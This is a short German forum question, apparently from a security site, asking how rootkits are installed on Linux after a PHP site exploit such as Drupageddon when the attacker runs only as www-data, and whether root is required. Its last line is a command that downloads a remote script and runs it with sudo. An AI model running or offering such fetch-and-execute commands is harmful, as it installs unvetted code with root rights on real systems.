Ich habe einige Beiträge zum Suchen nach Rootkits gesehen, konnte jedoch keine Informationen darüber finden, wie sie auf ein Linux-System gelangen. Insbesondere wenn Sie einen Fehler in einer PHP-Website ausnutzen (ja, ich spreche hier von Drupageddon ), ist es möglich, ein Rootkit zu installieren, obwohl Sie nur als Webserver (www-data) und nicht als root ausgeführt werden können. Die wenigen Informationen, die ich darüber gefunden habe, wie diese installiert werden, legen nahe, dass Sie root sein müssen, um sie zu installieren (siehe hier ).
wget http://mydomain/script.sh;sudo ./script.sh